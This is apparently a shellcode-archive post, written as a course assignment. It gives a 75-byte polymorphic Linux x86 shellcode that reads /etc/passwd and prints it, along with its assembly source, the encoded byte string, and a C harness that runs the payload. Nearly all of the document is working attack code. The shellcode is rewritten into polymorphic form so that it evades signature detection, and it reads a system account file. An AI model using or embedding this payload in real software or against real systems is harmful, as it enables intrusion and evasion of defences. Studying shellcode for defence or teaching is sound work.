# Title: Linux/x86 - Tiny Read Polymorphic Shellcode (75 bytes)
# Author: Xenofon Vassilakopoulos 
# Date: 2020-01-09
# Tested on: Linux 3.13.0-32-generic #57~precise1-Ubuntu i686 i386 GNU/Linux
# Blog: https://xenovass.wordpress.com/2019/06/26/slae-assignment-6-create-polymorphic-shellcode/
# Architecture: i686 GNU/Linux
# Shellcode Length: 75 bytes
# Original shellcode: http://shell-storm.org/shellcode/files/shellcode-842.php
# SLAE-ID: SLAE - 1314 
# Description: polymorphic version of tiny read shellcode that reads /etc/passwd 

-----------------------------------  Assembly -------------------------------------

global _start

section .text

_start:

        shr ecx, 16
        mul ecx
        mov al, 5
        mov dword [esp-4], ecx
        mov dword [esp-8], 0x64777373
        mov dword [esp-0ch], 0x61702f63
        mov dword [esp-10h], 0x74652f2f
        sub esp, 10h
        mov ebx, esp
        mov dx, 0x1bc
        int 0x80

        mov ecx, ebx
        mov ebx, eax

        mov al, 3
        mov dx, 0xffe
        inc dx
        int 0x80

        xor eax, eax
        mov al, 4
        sub bl, 2
        int 0x80

        xor eax, eax
        inc al
        int 0x80 

-----------------------------------  Shellcode -------------------------------------

#include <stdio.h>
#include <string.h>

unsigned char code[] = \
"\xc1\xe9\x10\xf7\xe1\xb0\x05\x89\x4c\x24\xfc\xc7"
"\x44\x24\xf8\x73\x73\x77\x64\xc7\x44\x24\xf4\x63"
"\x2f\x70\x61\xc7\x44\x24\xf0\x2f\x2f\x65\x74\x83"
"\xec\x10\x89\xe3\x66\xba\xbc\x01\xcd\x80\x89\xd9"
"\x89\xc3\xb0\x03\x66\xba\xfe\x0f\x66\x42\xcd\x80"
"\x31\xc0\xb0\x04\x80\xeb\x02\xcd\x80\xc1\xe8\x10"
"\xfe\xc0\xcd\x80";

main()
{
printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();
}